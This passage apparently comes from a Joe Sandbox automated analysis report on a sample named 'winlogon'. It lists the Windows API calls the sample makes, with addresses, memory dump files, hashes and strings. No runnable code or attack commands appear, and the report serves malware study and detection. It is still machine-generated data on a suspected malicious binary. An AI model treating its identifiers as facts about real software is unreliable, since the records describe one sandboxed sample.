                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                                                                            • API String ID: 2238633743-4044615076
                                                                                                                                                                                                            • Opcode ID: 4083e126882c5ced38b2982ecdd0aa8fb8f6d206dbe6733fa578fa79caa5add0
                                                                                                                                                                                                            • Instruction ID: b69252d3eda3f5ce78422e4d92470a3ce5f88092df5f94a3546d82688f01e71e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4083e126882c5ced38b2982ecdd0aa8fb8f6d206dbe6733fa578fa79caa5add0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28017572740705DFC710AFB59C84A573EE9DB58740316843FA605F22A0DA78C825DF78
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004068D0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405BF7
                                                                                                                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,00417EE0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C13
                                                                                                                                                                                                            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C5C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C94
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405CEC
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D02
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D35
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D9D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 352835431-0
                                                                                                                                                                                                            • Opcode ID: 8bb2a11c8592da06ff3adaae57ca199b6941de967179a06f560761e18254fef3
                                                                                                                                                                                                            • Instruction ID: 81b75aa7be9e3bfa6048845914e0abc472b891a7c2b0f3d519397b4cd530eeb0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb2a11c8592da06ff3adaae57ca199b6941de967179a06f560761e18254fef3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28517C31900609ABCF218F54DC49AEF7FB9FF49750F24812AF915B61A0D33989A0DF69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 004043C1
                                                                                                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 004043D5
                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 00404401
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403B88), ref: 00404439
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403B88), ref: 0040445B
                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403B88), ref: 00404474
                                                                                                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 00404487
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$Free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3512638745-0
                                                                                                                                                                                                            • Opcode ID: d26d06ecd7c4ffc8134835e528f208422d0f1f2bc766106d958cbaa5f9df33d0
                                                                                                                                                                                                            • Instruction ID: 5d972f26fcbcd176568d0505b3b115d55bd9c5a9d6aab9954fda4a9a130f43d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d26d06ecd7c4ffc8134835e528f208422d0f1f2bc766106d958cbaa5f9df33d0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7231F2F25042656FD7207FB49C84A3B7A8CE6C5358716063FFB42F3281EA398C558269
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00406844,00000000,?,00000000,00000000), ref: 00404A0C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000), ref: 00404A13
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandleWrite
                                                                                                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                            • API String ID: 3320372497-4022980321
                                                                                                                                                                                                            • Opcode ID: 74794024bdef46d4f1375075b0d2a88467e563281dfd164a22fa197795969e9e
                                                                                                                                                                                                            • Instruction ID: 9d75f8f840a33461f7636776d7fd5feb9408c1945f2d6d3db45423b93c088b80
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74794024bdef46d4f1375075b0d2a88467e563281dfd164a22fa197795969e9e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 413124F2A00218AEDB20EA61CC41F9B37ACEB84704F14447BF645F22C1E678DA408A6D
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,004068D0,00000001,00000001,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000), ref: 004052BF
                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00417EE0,00000001,?,?,00403894,004029CE,?,004029CE,00000000), ref: 004052D9
                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000001,004029CE,?,004029CE,00403894,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000), ref: 0040530D
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,004029CE,00000000,00000000,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000), ref: 00405345
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,004029CE,?,?,?,?,?,?,00403894,004029CE,?,004029CE), ref: 0040539B
                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(004029CE,?,00000000,00403894,?,?,?,?,?,?,00403894,004029CE,?,004029CE), ref: 004053AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3852931651-0
                                                                                                                                                                                                            • Opcode ID: 40b95dea3268905a436086882555c30f24bb0e1df8b30e35344bdaa847683b9a
                                                                                                                                                                                                            • Instruction ID: 690bf82c612f5ff1554cbd000954cf9474f10d0111165a3a49fad0687cfb2505
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40b95dea3268905a436086882555c30f24bb0e1df8b30e35344bdaa847683b9a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23418072601619AFDF109F94CC85AEF3F79FB09790F11443AFA02E2290D37989548FA8
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00401BF9
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000), ref: 00401C0D
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00401CA5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 00401C9D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$InformationLocalZonewsprintf
                                                                                                                                                                                                            • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
                                                                                                                                                                                                            • API String ID: 1715792076-4076198852
                                                                                                                                                                                                            • Opcode ID: 4a9d39a1a4b49a15a0af5199b82552f90bc8b5fc0a2882355a9521fa874379f6
                                                                                                                                                                                                            • Instruction ID: a1fd622096a8bf0a5f403f72d1136a8b65eff9f0f4c68601542a21ac2b23e156
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a9d39a1a4b49a15a0af5199b82552f90bc8b5fc0a2882355a9521fa874379f6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD3121B0D003189ACF10DFC5D8085EEBBF6EF05718F00806AE655B6290D3BC59A5CB5E
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000248), ref: 0040159F
                                                                                                                                                                                                            • GetNetworkParams.IPHLPAPI(00000000,?), ref: 004015AB
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004015C1
                                                                                                                                                                                                            • GetNetworkParams.IPHLPAPI(00000000,?), ref: 004015CA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocGlobalNetworkParams
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3514119424-0
                                                                                                                                                                                                            • Opcode ID: 64ea287f31f8f70f9e455f5829afd25059ed4c5d428ddc10713d94c60fd5a4de
                                                                                                                                                                                                            • Instruction ID: c581374ef95c225fa66d458b5d7b2084ae11338eb7f1df88d1f5ced31a198c6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ea287f31f8f70f9e455f5829afd25059ed4c5d428ddc10713d94c60fd5a4de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A31E676900214ABDB11DBA0CC45FDA77ECAF40750F0940B6EA45F72A1DB799E848B98
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 0040565E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                                                                                                            • Opcode ID: c081bf661c354abefa7763bfaee9c21e390ceceb934d95a70fe9e7886496f980
                                                                                                                                                                                                            • Instruction ID: 89ad30dfa35e05781fa7074c5eb3ee28ffe96362e3dd6f032609885112832f97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c081bf661c354abefa7763bfaee9c21e390ceceb934d95a70fe9e7886496f980
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45416931100A9C9EEB168724CD49BFB3FE8DB06700F1404FAD549EB1D2C6794A48DFAA
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%